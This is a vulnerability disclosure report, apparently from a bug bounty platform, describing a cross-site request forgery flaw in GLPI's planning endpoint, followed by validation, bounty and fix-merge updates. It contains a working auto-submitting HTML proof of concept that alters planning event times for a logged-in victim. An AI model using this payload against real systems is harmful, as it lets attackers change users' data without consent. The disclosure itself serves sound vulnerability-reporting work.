Cross-Site Request Forgery (CSRF) in glpi-project/glpi

Valid

Reported on

Sep 13th 2021


✍️ Description

Hello dear glpi team I found one more CSRF vulnerability.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in In Firefox or safari.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here a Planning start and end times with items_id 3will be changed after clicking on submit button on PoC.html file.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://nocompany.with7.glpi-network.cloud/ajax/planning.php" method="POST">
      <input type="hidden" name="action" value="update&#95;event&#95;times" />
      <input type="hidden" name="start" value="2021&#45;09&#45;13T08&#58;30&#58;00&#46;000Z" />
      <input type="hidden" name="end" value="2021&#45;09&#45;13T12&#58;00&#58;00&#46;000Z" />
      <input type="hidden" name="itemtype" value="PlanningExternalEvent" />
      <input type="hidden" name="items&#95;id" value="3" />
      <input type="hidden" name="move&#95;instance" value="true" />
      <input type="hidden" name="old&#95;start" value="2021&#45;09&#45;13T08&#58;30&#58;00&#46;000Z" />
      <input type="hidden" name="new&#95;actor&#95;itemtype" value="" />
      <input type="hidden" name="new&#95;actor&#95;items&#95;id" value="" />
      <input type="hidden" name="old&#95;actor&#95;itemtype" value="" />
      <input type="hidden" name="old&#95;actor&#95;items&#95;id" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
We have contacted a member of the glpi-project/glpi team and are waiting to hear back 9 months ago
Alexandre Delaunay validated this vulnerability 9 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
François Legastelois confirmed that a fix has been merged on 93750e 24 days ago
François Legastelois has been awarded the fix bounty
to join this conversation